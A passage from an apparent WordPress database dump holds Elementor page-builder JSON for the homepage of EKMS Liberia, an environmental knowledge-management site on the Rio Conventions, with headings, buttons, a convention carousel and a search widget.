center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13226,2142,'_elementor_version','2.7.5'),(13227,2142,'_elementor_template_type','wp-page'),(13228,2142,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13230,2143,'_wp_page_template','default'),(13231,2143,'_elementor_edit_mode','builder'),(13232,2143,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(0,0,0,0.14)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"left\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"left\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas 